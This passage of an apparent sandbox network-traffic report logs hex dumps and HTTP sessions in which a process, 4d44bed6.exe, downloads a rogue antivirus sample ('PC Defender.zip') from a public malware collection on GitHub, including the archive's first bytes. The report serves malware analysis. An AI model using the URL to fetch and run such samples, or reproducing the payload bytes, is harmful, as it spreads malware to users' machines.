                                                                                                                                                2022-09-29 12:51:45 UTC26777INData Raw: 4e d0 6b 10 2a 19 7e 87 84 ab 34 52 98 3a 90 f3 59 b1 74 22 fa 17 18 2d fb 24 32 39 e3 6f f2 93 10 cb 0a 0d 65 f3 8d ed 14 05 3f 92 62 a6 3b 61 bb ec 9e a3 77 27 4d 98 bc 3d d0 c2 1e 57 2a a6 5a 70 d2 69 e9 4c 31 01 5d 15 8b c2 a1 09 3c 8d 8c 8f 5d 04 0f d2 1d fa ea e7 ae 7b bb b8 33 5f c4 a0 44 32 8b 26 04 0f e6 b9 42 01 35 37 77 71 9d f6 0c e5 58 6f b4 4b 7f 23 a7 3f 9b 5e 96 0d fa 8b 67 b4 4a 27 b0 3f 63 d3 01 de 60 c9 4c db f7 c6 19 78 2c 58 b6 62 69 43 f6 f2 00 da 2c c5 c4 eb 2d 19 98 cd b8 81 23 29 5b 6e b8 5f a2 3e 78 80 00 11 a2 4b 0c be e6 25 0b b3 6b 1d a6 fb 28 f6 74 5f 50 5b 5a ac 0d 22 25 bc 5f 3a 85 e8 a7 c6 d8 f2 ae d6 68 19 3b b1 8b fb 66 9e d1 63 20 a3 9c 3f 44 40 85 70 c3 aa 3d 61 1d 97 81 f5 43 53 83 2c b4 d2 a1 c5 9e 0a ca ba e4 c4 4e
                                                                                                                                                Data Ascii: Nk*~4R:Yt"-$29oe?b;aw'M=W*ZpiL1]<]{3_D2&B57wqXoK#?^gJ'?c`Lx,XbiC,-#)[n_>xK%k(t_P[Z"%_:h;fc ?D@p=aCS,N
                                                                                                                                                2022-09-29 12:51:45 UTC26793INData Raw: 6a 13 df 77 ef 2d b3 9c 61 85 4e ea 40 77 f2 c9 89 33 29 66 4a 84 6d 59 69 f8 6c 20 6c f9 7a 72 8b 5a db e5 4c 39 ac 06 90 4e 40 a6 c6 e0 dc 82 43 12 76 50 14 b5 70 d7 97 fc 25 c5 2a 79 aa 59 ad cb af 83 99 5b a1 41 4c 55 4d b1 90 f1 cf 85 2d 76 77 24 99 17 e5 6d a5 e0 a1 18 ef ef e1 10 f2 f0 fe 40 24 1c 34 fd dd ff d2 85 0f ae e5 b6 4d 9e ee 2f 3c 90 5d c1 b9 bc fa 41 14 82 e6 9c fa 08 17 18 3a 7f da 82 05 05 ae ca 4b 85 00 3b ec 48 83 8c 92 e2 ac d9 71 42 36 65 1e 4e dd a6 24 ec 85 cd 5c 39 d6 0f 27 ef e8 75 0c 59 fc d8 6e 11 96 2d bf 0c 97 6c 2c d1 13 1e 0e 90 7b 60 85 9e 0e 90 ba 12 91 f3 b5 25 43 7e 71 fd ef 4a 1b 23 c5 5f e9 4d 36 f8 97 94 3a 3b f4 4a 21 b9 cd af 96 d0 d8 9c ac 63 db 1f a6 a5 cd 59 ec 0c b9 2d ec 06 68 a8 b7 0e 40 62 cb 16 d0 42 f5
                                                                                                                                                Data Ascii: jw-aN@w3)fJmYil lzrZL9N@CvPp%*yY[ALUM-vw$m@$4M/<]A:K;HqB6eN$\9'uYn-l,{`%C~qJ#_M6:;J!cY-h@bB
                                                                                                                                                2022-09-29 12:51:45 UTC26809INData Raw: 59 97 24 fd 77 5c 5a 7c 27 ae 3e 9d 25 cf 1a f3 29 67 c3 8b f1 2c dd 94 8c d1 c4 81 b5 22 14 f7 61 84 69 6a 10 23 4c 37 c2 b4 7e a4 48 4d 6b e4 8c 31 a6 e0 e6 49 25 94 b9 d9 9f 7c 37 da d3 45 a9 52 a5 d6 41 f4 69 97 92 66 3b 68 a9 a3 53 d7 f5 a1 75 22 0a e9 ba 6f 36 54 af fc f5 c5 aa e5 0f 12 8a 43 c0 21 ce 76 47 0c 93 37 ea 60 61 58 40 0a 51 e8 9a d7 15 1c 26 9a f5 be 3b f1 20 8e 22 ee 7e 57 59 43 8a 66 35 b0 1b 25 6f 20 ac f9 0c 5f a1 fe 5a 9f e9 fb 20 7a 36 9a 1d e9 44 64 a0 2b 4b 66 b8 5a c5 bc 3d 38 ad 95 88 59 1c 84 e4 35 18 03 b6 f7 5d ea 55 1a e1 7f fe 06 53 de 94 ec f3 05 b2 a6 95 4f 7d 41 db 31 b2 11 b7 75 70 3a 11 6f 58 45 a1 29 4e 04 91 8e 28 b2 88 81 d7 3f c3 8f df 12 a8 72 08 bd 5e bd 9b de d5 52 4a ec 37 be 68 6a a2 5e 29 4d 02 ec b4 c5 c5
                                                                                                                                                Data Ascii: Y$w\Z|'>%)g,"aij#L7~HMk1I%|7ERAif;hSu"o6TC!vG7`aX@Q&; "~WYCf5%o _Z z6Dd+KfZ=8Y5]USO}A1up:oXE)N(?r^RJ7hj^)M
                                                                                                                                                2022-09-29 12:51:45 UTC26825INData Raw: 31 5e c0 f1 23 5e 5d 18 63 9f 7a 3a 9d 63 f2 5f a6 30 59 1d 03 ed 7c 2d 00 dd 00 b8 f0 97 bd 2e 5c 1c 20 1e bb c8 49 d9 f0 3a 1c 38 cc 35 c5 3f 9c 4a a2 fb 23 35 af 75 b5 b6 5a 1c 56 8e 66 0f e2 68 65 d1 c3 7d 55 2d 9d 12 12 f4 76 95 64 0c 81 81 4d af 27 3b af 54 cc f0 d1 08 7f f1 0b f7 0b 04 83 70 93 cc db 4e f5 1f 87 ec 0e 54 ee 8a 75 e0 11 0e b0 ad 13 f4 91 54 29 63 05 76 20 db b7 76 c2 f9 52 11 dc 0c 9f 01 ed 1c d0 52 1e d2 fc fb 6b a0 c1 3d 05 bb 2a d3 7f 93 c2 73 ef 2c 4f 2f cc 3b 2a 1d cd 7b 59 0a 78 39 19 31 98 44 84 73 ab 13 c7 85 6f 1e 9c 88 72 70 d4 ab b3 ce 38 ac e6 6e 80 64 ab fe a2 59 42 5e a5 aa 01 7f 76 99 d6 46 91 6b be f1 fd 9c 4e f3 97 13 2b 27 0a ec 6f 7c 54 74 0d 81 d2 90 b2 b2 a2 fb 9a 3f 04 17 ee 3f 1e 9e ec b2 7d 10 dd 28 28 01 5d
                                                                                                                                                Data Ascii: 1^#^]cz:c_0Y|-.\ I:85?J#5uZVfhe}U-vdM';TpNTuT)cv vRRk=*s,O/;*{Yx91Dsorp8ndYB^vFkN+'o|Tt??}((]
                                                                                                                                                2022-09-29 12:51:45 UTC26841INData Raw: 6b bc 13 9c e5 d5 a9 4b 94 e0 5f 8e 00 40 cb cb ff f4 2b bb c0 41 d0 7d 5e 7e e6 42 4d 21 cb 12 3c bf 66 a3 50 01 52 80 2c df 1d ab 88 53 35 dc 58 1f 4e c8 06 58 e1 b8 b7 32 72 9d 61 bc 33 2f 21 97 79 74 74 e4 fc 20 c8 d3 38 51 89 fc ec d5 47 34 0a 7f c5 72 0c 85 5e c1 d1 a9 0b ac dd 81 9f 45 f5 7f 94 b0 8a 5f 98 d8 69 87 19 40 af ad 5b ae 8d 8e da b9 28 2e cf c7 5b 40 f8 65 e3 d2 14 3b 27 03 b4 77 d0 a4 a4 01 af 25 f4 3a 34 b4 70 87 94 83 4e c7 47 40 c7 62 10 34 36 9c f1 44 ba 75 d4 2c e4 04 d1 40 c6 ce d0 5f 89 39 58 69 9c b7 4a 82 f3 f3 64 0b 95 a5 40 62 ed 8e 3d d3 eb a0 17 6e 8e 68 c0 d6 4a 8f 33 79 ec 98 d9 b2 a8 a7 16 8b 5c a9 2a c1 12 43 1c a7 8d 7b 02 f0 19 8a 79 81 43 73 88 b2 dd 95 c0 d3 ea 45 74 19 a5 c8 70 c2 99 c3 d5 6b be 74 8d 18 64 89 2c
                                                                                                                                                Data Ascii: kK_@+A}^~BM!<fPR,S5XNX2ra3/!ytt 8QG4r^E_i@[(.[@e;'w%:4pNG@b46Du,@_9XiJd@b=nhJ3y\*C{yCsEtpktd,
                                                                                                                                                2022-09-29 12:51:45 UTC26857INData Raw: 0d ca 94 c0 23 7a 6e 66 bf 60 6e a5 4d c3 16 1c 3f 5d df 3f 5c 4f 93 00 3d d8 bc 8f 06 74 4d 12 ce df 43 16 fc d6 98 84 90 61 ba 06 98 41 98 4d f9 94 da 81 d4 e5 2e 50 f6 9b 2e 9d 22 d1 07 2a d3 ae f4 77 82 49 6b ce 5f db b1 89 f8 29 ef 6c c8 2b e9 31 8b e0 84 18 c3 f2 83 e8 a8 8a 8b d2 43 51 1d 6e 78 48 00 7f a4 6d 77 80 ae 5a 34 f6 88 1c e3 14 79 7d b4 1b ce 19 88 20 8a 0c f9 d0 7e 10 3e ec 15 b9 fd ff 2c 0c a1 79 ed cb 2e 80 4a 5e ca 8e c2 cc c4 db f1 bb 53 74 26 3c e9 67 d0 48 53 16 ad 0a ec b1 ee 6d c2 26 27 1a 46 1a 1e ad a0 bc 28 84 7c 5c 00 51 f3 87 7c b3 d3 6f 7c 12 65 41 89 ac 90 b3 79 fb 45 75 83 e5 f6 b6 08 b0 20 82 b0 5d 17 2f 47 6f 8f d1 d0 39 15 f3 b9 96 f9 88 8d e5 f3 e0 47 fd 94 c1 d6 0d 80 4f b5 30 ff df 4a f5 bb 0e 89 fb 7a 7e c0 eb e3
                                                                                                                                                Data Ascii: #znf`nM?]?\O=tMCaAM.P."*wIk_)l+1CQnxHmwZ4y} ~>,y.J^St&<gHSm&'F(|\Q|o|eAyEu ]/Go9GO0Jz~
                                                                                                                                                2022-09-29 12:51:45 UTC26873INData Raw: e2 8c 7d a8 a6 6c e3 a2 25 c5 30 be c4 a3 01 e0 44 d8 bd 77 ad 22 ad b7 d8 82 f9 ca e5 c2 c3 45 e1 22 70 01 b6 fc 7c 74 68 6e 89 d8 af 7c 95 17 06 9d 15 7b 01 e9 69 b3 15 11 b9 12 00 3c 02 87 e8 e5 c3 35 a0 5c 67 1f fc 94 1d 97 5a e9 31 a5 52 2a 80 2e 08 eb 85 0e 14 f7 93 98 d2 77 36 c5 43 34 91 50 68 ce 1d 0f 98 b6 61 32 c9 e2 92 f0 92 82 72 82 72 2a cd 6d 3c ba 1d a1 1f 2b 48 9e ce ff ef e0 41 ab 57 cf e3 47 f0 4f 47 8c 45 9a 00 a5 ce 31 e9 56 59 ba 7c 9f ed 1a 4a 52 dd f6 ea b3 05 83 2c a6 ed ab 2b 96 e8 44 3e 1e c8 69 ec 1b 1d 19 03 53 ff f8 f2 e3 68 83 11 df 06 e7 23 60 08 33 0a b4 a1 8c ea 59 b6 34 f6 30 08 b5 72 df 52 e3 a3 22 87 ff 60 0c 2c 9c 89 10 81 39 61 fe e1 0c 87 e4 c0 75 ab 4b 93 3d 6b e2 f2 43 df 3e 40 74 c7 0e d5 dc 53 af be f8 46 e7 06
                                                                                                                                                Data Ascii: }l%0Dw"E"p|thn|{i<5\gZ1R*.w6C4Pha2rr*m<+HAWGOGE1VY|JR,+D>iSh#`3Y40rR"`,9auK=kC>@tSF
                                                                                                                                                2022-09-29 12:51:45 UTC26889INData Raw: c9 c8 f9 ed 53 07 d2 95 29 47 0a 90 3b fe 20 c4 7d 16 77 7f cc 31 08 7b bc c8 1a ca 45 b6 a5 22 0c 20 ff 3a 4a 7c 14 b5 d2 a2 ca b3 f2 ff 07 04 ab 33 c6 4e cf 21 6c 1e d2 f5 7b a7 5b 66 32 da 02 ff 6c 5d 4d 4e 8d d6 16 2b 39 4b d1 3b 86 65 45 6b a5 16 1a e1 9c e6 63 c9 e4 65 71 6f 24 8b c9 5e e8 02 f9 bc 0e 26 6e 77 7e 94 cd 2b 39 54 52 c9 17 9e c1 1f d0 bf 81 98 54 0f 33 06 0e 67 41 3d fa 15 c9 74 08 39 ea 8d a7 07 d5 e8 9d 47 a5 3b 0f 9b 8d dd 99 0b a8 27 e9 90 1c 03 e8 87 13 48 82 c7 3e 54 46 a7 6e 4f ad 11 e8 65 eb 70 69 d5 2d 61 4f ab a4 a2 ec db c6 96 a7 7e 86 2b ea 7b e0 53 d9 4d 98 b6 22 32 bd dc f1 5a 01 33 3c 60 ff 4a 9c ee 31 cc 5d 08 3a 1d 74 d6 18 2b e1 f7 06 34 7c 97 ed 0a 45 07 0d b7 44 b3 46 43 96 35 87 90 39 bf 4d 93 a9 ca dd f7 8c 65 6f
                                                                                                                                                Data Ascii: S)G; }w1{E" :J|3N!l{[f2l]MN+9K;eEkceqo$^&nw~+9TRT3gA=t9G;'H>TFnOepi-aO~+{SM"2Z3<`J1]:t+4|EDFC59Meo
                                                                                                                                                2022-09-29 12:51:45 UTC26905INData Raw: e3 27 c9 bb 1e 20 33 3b a2 07 91 77 a2 97 e9 64 c6 b0 f9 8d d6 c5 eb 5a c6 8d e9 96 f6 56 7d 95 9e 17 c9 b2 4a c7 e3 ef 1b 9b 5b dd f3 b6 29 65 f8 46 94 b0 ba 0f 65 95 50 ce 5b 0f 58 cc 32 14 5f 63 36 76 f0 ff af 35 53 a1 59 49 86 37 18 91 0e c0 d7 cf 66 8b e3 86 49 8a 2b 53 20 fc 31 f7 6e 0c 2e ac 2a 62 43 8d da 2d 4d 78 9c 15 38 19 ed 47 ad 0d a6 c9 f5 e0 ee 5e 83 83 7b 34 75 00 bc 77 a8 4d dc 6c 9f d2 ad 9e 39 59 14 49 04 db 85 8f d4 c9 1c 9f ee f7 97 9b 38 17 02 7b d6 35 6a 1a 25 25 35 5d 7f 3c 50 40 a8 52 35 4d c3 ad d3 91 c3 08 39 b4 5f 54 0c b4 0e d8 e4 c8 c8 de 0e e2 a9 f3 b3 47 10 d4 c9 8d 3b e5 01 33 9a 8f fe 29 03 28 69 ce 4d 4c 80 2f f8 f4 aa c2 89 ea cb 4b cb b2 3f 7b 6f 4b 1c bc f9 16 20 74 3e 52 02 ff d6 6c b7 5e e5 ff ef 50 26 a9 c8 fb 7d
                                                                                                                                                Data Ascii: ' 3;wdZV}J[)eFeP[X2_c6v5SYI7fI+S 1n.*bC-Mx8G^{4uwMl9YI8{5j%%5]<P@R5M9_TG;3)(iML/K?{oK t>Rl^P&}
                                                                                                                                                2022-09-29 12:51:45 UTC26921INData Raw: 02 e2 d9 40 ff 50 67 29 9c ac 90 cc 79 b3 ac 1a 09 dd 39 80 84 12 6e e5 8b 75 e4 54 53 4a 3e 56 95 5a a1 7b 33 50 5d 96 1e e4 a2 8b 76 be d4 bf 38 84 65 53 9b 89 c3 42 8b c5 3b 11 c8 15 26 94 0e 03 d2 70 f3 8c 8b fd b8 3b 88 47 84 01 56 fa 28 5c 88 0b 35 7f e2 70 0a 51 17 66 ea b6 ae 05 22 b6 fc ae ef 89 08 dc 49 ab 0c 16 17 48 9a 2b 97 78 cb b6 b4 ab 5f 6a a2 a0 2c bb 22 8d 5a 9b e5 f2 a1 88 bd 8f fc b4 d8 e0 42 14 bf 53 c9 68 1d fa 88 14 a3 c3 54 77 05 05 7a b7 a1 65 57 4b d2 67 9f ad 77 73 88 7b 59 68 1c 71 6c 78 4e 4f 72 10 2a 0e 9f de bd fb 15 e5 e1 bb 21 c4 bf 5f e4 71 02 1f c9 bb cb 8f 5d 3c 07 fb ae 79 59 02 c8 58 55 f9 df 6c 35 d9 ce 7c ce 4e 35 68 07 3a 72 aa 94 05 27 3c 86 2a fc c2 44 1f 48 07 ee 69 06 69 a1 55 1c dc 01 39 7b 19 e6 23 99 0f 79
                                                                                                                                                Data Ascii: @Pg)y9nuTSJ>VZ{3P]v8eSB;&p;GV(\5pQf"IH+x_j,"ZBShTwzeWKgws{YhqlxNOr*!_q]<yYXUl5|N5h:r'<*DHiiU9{#y
                                                                                                                                                2022-09-29 12:51:45 UTC26937INData Raw: 88 07 e6 89 a0 aa f2 0c 9a bc 40 ed 40 07 77 39 86 50 fd f9 02 a7 e0 00 f3 50 22 c9 31 30 13 4c 15 d9 20 cd 5a 86 e1 7a 01 09 df 58 8b 89 d0 5d 66 71 d2 e2 cd b3 91 ab 9e 1f 44 4c 83 09 fa b6 5b 30 eb 52 5e c6 57 78 73 20 31 28 0b cf 15 8b c8 a8 05 14 5e 54 a0 b5 f5 c1 ea 78 b2 28 6e a7 f7 81 45 d9 22 9e 9c 5f 25 87 63 7e b0 17 2d 51 0a 0f c8 b7 6a 08 57 0e 35 cf a4 3e d1 11 fe dc d6 15 6e 5f 33 8b eb 6c 6a fb 34 a9 05 0a b3 7f 8f 1e d8 01 14 c0 c4 96 bb 9a a7 0e 94 34 3b b9 fe 90 5e 76 0a 7c 21 bb ec 6a 28 04 19 8e 3d 70 c8 d6 f7 64 37 50 22 98 99 79 db 35 3d a8 7f ab df d1 28 77 4f 45 36 b1 db bf 75 e1 ff c5 c0 38 36 18 02 6f ed c4 02 90 b0 e6 7b 6a 62 05 bb db b5 27 2f c3 7b c9 a6 e2 90 af 9e 7b 2e 11 f4 d9 ae 23 d8 ac f9 3f 2e 83 8e ed 00 aa 3e 6c 7a
                                                                                                                                                Data Ascii: @@w9PP"10L ZzX]fqDL[0R^Wxs 1(^Tx(nE"_%c~-QjW5>n_3lj44;^v|!j(=pd7P"y5=(wOE6u86o{jb'/{{.#?.>lz


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                48192.168.2.549748140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:48 UTC26950OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/PC%20Defender.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                2022-09-29 12:51:48 UTC26950INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:48 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/PC%20Defender.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:51:48 UTC26951INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                49192.168.2.549749185.199.108.133443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:48 UTC26953OUTGET /Endermanch/MalwareDatabase/master/rogues/PC%20Defender.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                2022-09-29 12:51:48 UTC26953INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 857943
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "738aade4b65e8d55bc499c1fb84c57dfe29cfd2ed7020abafa8928ad4af9df68"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: BC88:67BA:7D00:C44DC:6335935E
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:48 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6974-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455908.477714,VS0,VE166
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: 9e96e1a4b24bd8088bd081bb911856c8a89d352f
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:56:48 GMT
                                                                                                                                                Source-Age: 0
                                                                                                                                                2022-09-29 12:51:48 UTC26954INData Raw: 50 4b 03 04 14 00 01 00 08 00 b5 6e 76 3c 8d 65 a2 b8 9f 16 0d 00 fe b9 0d 00 19 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 50 43 44 65 66 65 6e 64 65 72 2e 65 78 65 c0 3f 16 f4 90 05 1f 72 a9 d7 14 6f e9 0f f9 e9 0c f1 a5 34 cc d0 b4 ad 49 9b 03 12 30 a4 5d b9 f3 f6 75 39 05 17 df 5c f2 dd ee aa bb e1 c2 73 4e ce 44 4b 40 f5 b8 2f df 0a 94 61 7e 5b a5 25 1c 40 89 cb 6e 1d 85 89 fd 7d b0 81 37 c8 fa a3 ea 88 c5 8c f5 74 a9 91 b4 3b bb c6 30 3d 10 ad 12 d2 7c c5 74 87 a3 f5 84 10 00 94 6c ae c3 b7 98 b3 38 ca e0 21 e8 8e af 57 b0 09 80 04 ce 23 d3 71 2a 42 8d b1 bb 7b 99 f9 53 b6 2c 07 79 ec c3 94 8e c9 1f cf 0d 2c 8e b4 97 32 76 13 0d 41 25 78 95 b2 3c dc b9 df 7b e1 6e 51 0e 8f aa 19 53 3e 94 42 8c 90 08 02 ce 1f 82 87 24 da 62 28 48 39 ba 48 89 e3 93 fa
                                                                                                                                                Data Ascii: PKnv<eEndermanch@PCDefender.exe?ro4I0]u9\sNDK@/a~[%@n}7t;0=|tl8!W#q*B{S,y,2vA%x<{nQS>B$b(H9H
                                                                                                                                                2022-09-29 12:51:48 UTC26955INData Raw: 78 ad 1f 65 a8 f1 fb 65 d2 13 15 56 ce a0 55 9c 7b 5b 44 a5 ec f1 d9 86 1a 80 94 d1 03 98 18 d5 d2 56 04 05 75 ed 5a 7b b4 c1 db 5c 96 3b a7 e1 b5 39 76 cb 22 4b e9 6a 51 35 73 e9 4a f1 3c 1b b4 30 28 79 8d d9 89 6c 98 b4 34 49 68 4d 8c 4f c1 1a 14 c6 a6 ec 32 9d f7 60 80 c1 ad a7 70 3b b3 d6 96 17 07 a4 f4 e9 2a af 8a 87 86 26 e5 5a 42 96 79 fd 67 ac a0 db 01 cf cb 06 54 f3 66 50 14 63 0c 11 21 72 b9 88 44 9b 84 80 a4 6b 0c cc 0a 01 c4 ad 4f 7f 9c 88 8a 09 e4 b8 85 8d c6 15 5a 82 cc 98 29 ae a0 82 e3 66 e6 a3 39 cc 3f fc 57 a1 f6 32 ab 34 c0 23 7c 33 24 fa 3f b9 80 a7 5b cb 51 01 8c a9 eb f5 b2 2a 5c 23 8d 6d 05 81 f9 e7 32 1b e3 37 07 90 e7 0c 64 11 52 8f 9c 13 0c 8e 28 44 ae 06 ff 55 a5 7f d2 5c cf 64 82 b9 10 71 63 93 28 a6 27 1c 45 dd 4c 93 eb 1a 72
                                                                                                                                                Data Ascii: xeeVU{[DVuZ{\;9v"KjQ5sJ<0(yl4IhMO2`p;*&ZBygTfPc!rDkOZ)f9?W24#|3$?[Q*\#m27dR(DU\dqc('ELr
                                                                                                                                                2022-09-29 12:51:48 UTC26956INData Raw: 15 54 03 ba 79 b1 e9 af b8 c3 cb 76 7a 1e 6b 7e 80 fc 12 fb ac e8 38 4e fc 0c e3 14 21 6f 3a 6b 89 ae ea 06 9e 87 4b 5b cb 12 05 dd 9b ba b3 b4 bb 9d 94 83 98 98 14 be 17 e0 ab 80 67 78 70 f3 78 f0 e4 54 3c 6a bb 13 b1 7c 78 68 d4 ac 1a 1c 26 80 41 f4 7a f6 47 fa 3d f8 ce 00 f1 32 08 c7 e0 d9 1b 27 cf 95 c7 7e 6d 8d 73 c8 5f 7f 39 8c 61 f7 ae a4 8a 88 26 49 d5 39 87 6e 4c b8 08 01 8d 09 fb 2b 14 a2 48 f8 50 9f a4 39 27 8d 00 9d a8 e7 4c bb ed 99 bb 3a a6 d4 d6 58 7f 81 46 67 e2 cb 5a 07 e7 37 bd df 94 a9 14 b6 d7 45 7d 80 ff c7 40 67 9e 23 1a a5 7f 45 b3 41 52 34 85 23 70 b6 96 ce 06 75 50 86 70 c8 f3 dc 48 9b b3 0d 4a dd 01 a2 ee 20 e9 d1 f8 13 72 0c 93 f0 91 e2 0d 40 f4 83 9c df 3e 8d 8b dc 83 af 67 d2 5f f0 70 55 f1 c3 ee 7a 52 be 47 0f 04 2d ad a1 df
                                                                                                                                                Data Ascii: Tyvzk~8N!o:kK[gxpxT<j|xh&AzG=2'~ms_9a&I9nL+HP9'L:XFgZ7E}@g#EAR4#puPpHJ r@>g_pUzRG-
                                                                                                                                                2022-09-29 12:51:48 UTC26958INData Raw: 5d 49 78 1e c5 f1 8e 93 c5 f0 1d c2 bb bb e5 2d 4d d8 db 14 fa ee e6 d0 17 d8 1c 8d c6 31 48 cb 41 ae d7 01 6e 3e 13 4e 58 34 4b 0d fa b6 62 e3 2f bf 51 e6 f8 66 63 be d0 84 dd 85 84 fc 02 9d fb 2a 63 cd 27 d7 57 7f d3 95 cb 17 4a 6f 1a fa ee 98 54 40 4c 74 e1 8a aa 8e 5e bf 06 1c a0 b5 26 c3 00 df 16 9f 4f ca dd 35 d5 97 57 5f 0b 02 42 61 dd 67 1a db 84 eb 54 f9 a3 b0 f7 90 e0 6d 40 0f 16 f6 2d ac 48 67 6b 2f 2a a6 2a 23 a3 8f 57 66 2a d8 da e0 31 35 61 34 fc 6c 1e 0a bc ba 86 e3 db 3d e3 23 5d e2 e9 01 74 c1 04 59 e8 1a 97 47 e0 be f1 f0 28 83 b6 97 53 18 2c 91 62 a5 c2 4c 6a 80 a1 48 ac a7 ed e9 1b c7 71 8a 6c ee 07 91 78 c5 95 9a 7d 3b 2e 53 4d 6f ca 87 1b 8d 60 69 14 12 39 ad 78 56 4e 9a f8 a6 95 bf f0 41 26 e7 1c 95 52 47 08 c6 4f e8 54 07 13 96 9d
                                                                                                                                                Data Ascii: ]Ix-M1HAn>NX4Kb/Qfc*c'WJoT@Lt^&O5W_BagTm@-Hgk/**#Wf*15a4l=#]tYG(S,bLjHqlx};.SMo`i9xVNA&RGOT
                                                                                                                                                2022-09-29 12:51:48 UTC26959INData Raw: 1f 98 4d 48 22 e2 82 1b 81 ce c6 09 bd f5 2d 6f ed 81 0f 9b c1 5b 8c 7b 4d 04 51 a2 3c a7 24 81 09 b9 c1 1a d9 5d 68 09 03 09 28 26 4a 35 d7 21 e9 d7 65 d5 9c b9 3e 4d b6 3d 8d 64 a7 b9 0e 95 86 64 b8 a6 6a 07 c1 5e 40 0a 46 fe 71 59 c0 e0 66 e9 51 71 91 f6 e7 1e 0c 2d b9 63 94 dc 3f 1a 00 9a 82 83 69 f7 f6 db 76 0b c9 6f ea d6 61 0c 26 98 c4 6e 35 7d 9c 3e 6d 87 a7 28 81 33 c8 9b 18 4e f5 b9 69 a6 34 64 8a d5 cd 1d 78 4b a4 01 4e 55 83 fe d7 80 30 82 95 92 65 c7 49 ea ff 1f 95 18 a4 62 b3 d0 d0 ca 8b 4f 90 6a 69 7a 84 65 77 95 06 35 e0 58 a9 d7 e4 e8 32 9c 93 19 69 14 4e 8f 2c e2 f2 5f 2b f6 6a 70 2f c9 a0 4e 8d 0e 02 09 41 00 d0 43 31 6e 8e 2a 62 ed a9 f4 ec 87 70 58 f4 f3 43 e1 54 47 2e 60 8b 88 1d fe 73 6b d8 c3 80 67 40 3b d2 d8 fb 5b 7c f2 5a 17 78
                                                                                                                                                Data Ascii: MH"-o[{MQ<$]h(&J5!e>M=ddj^@FqYfQq-c?ivoa&n5}>m(3Ni4dxKNU0eIbOjizew5X2iN,_+jp/NAC1n*bpXCTG.`skg@;[|Zx
